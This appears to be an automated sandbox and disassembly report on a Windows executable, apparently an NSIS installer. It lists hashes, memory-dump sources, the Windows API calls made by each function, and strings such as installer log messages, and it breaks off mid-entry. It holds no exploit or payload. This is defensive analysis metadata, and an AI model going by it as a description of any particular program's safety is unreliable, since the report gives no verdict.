                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                          Control-flow Graph

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                          APIs
                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                          Control-flow Graph

                                          [Control-flow graph rendering omitted: basic blocks 405479-405929; besides the APIs listed below, the graph shows calls to CreateDialogParamW, GetWindowRect and ScreenToClient]
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                          • ShowWindow.USER32(?), ref: 004054D2
                                          • DestroyWindow.USER32 ref: 004054E6
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                          • EnableWindow.USER32(?,?), ref: 00405757
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: @rD
                                          • API String ID: 3282139019-3814967855
                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                          Control-flow Graph

                                          [Control-flow graph rendering omitted: basic blocks 4015a0-4030f2; the API calls it shows are listed under APIs below]
                                          APIs
                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                          • ShowWindow.USER32(?), ref: 00401753
                                          • ShowWindow.USER32(?), ref: 00401767
                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                          Strings
                                          • Rename: %s, xrefs: 004018F8
                                          • Jump: %d, xrefs: 00401602
                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                          • SetFileAttributes failed., xrefs: 004017A1
                                          • Call: %d, xrefs: 0040165A
                                          • BringToFront, xrefs: 004016BD
                                          • detailprint: %s, xrefs: 00401679
                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                          • Rename on reboot: %s, xrefs: 00401943
                                          • Rename failed: %s, xrefs: 0040194B
                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                          • Aborting: "%s", xrefs: 0040161D
                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                          • Sleep(%d), xrefs: 0040169D
                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                          • API String ID: 2872004960-3619442763
                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                          Control-flow Graph

                                          [Control-flow graph rendering omitted: basic blocks 40592c-405c3e; the API calls it shows are listed under APIs below]
                                          APIs
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                          • API String ID: 608394941-1650083594
                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • lstrcatW.KERNEL32(00000000,00000000,135,004CB0B0,00000000,00000000), ref: 00401A76
                                          • CompareFileTime.KERNEL32(-00000014,?,135,135,00000000,00000000,135,004CB0B0,00000000,00000000), ref: 00401AA0
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                          • String ID: 135$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                          • API String ID: 4286501637-883799166
                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                          Control-flow Graph (function starting at 403587; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00403598
                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                          Strings
                                          • Inst, xrefs: 0040366C
                                          • Error launching installer, xrefs: 004035D7
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                          • Null, xrefs: 0040367E
                                          • soft, xrefs: 00403675
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 4283519449-527102705
                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                          Control-flow Graph (function starting at 40337f; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004033E7
                                          • GetTickCount.KERNEL32 ref: 00403464
                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                          • wsprintfW.USER32 ref: 004034A4
                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CountFileTickWrite$wsprintf
                                          • String ID: ... %d%%$P1B$X1C$X1C
                                          • API String ID: 651206458-1535804072
                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                          Control-flow Graph (function starting at 404f72; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                          • String ID:
                                          • API String ID: 2740478559-0
                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                          Control-flow Graph (function starting at 401eb9; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GlobalFree.KERNELBASE(00879208), ref: 00402387
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FreeGloballstrcpyn
                                          • String ID: 135$Exch: stack < %d elements$Pop: stack empty
                                          • API String ID: 1459762280-2550604189
                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                          Control-flow Graph (function starting at 4022fd; rendered graph and executed/not-executed legend omitted)
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • GlobalFree.KERNELBASE(00879208), ref: 00402387
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 3376005127-0
                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
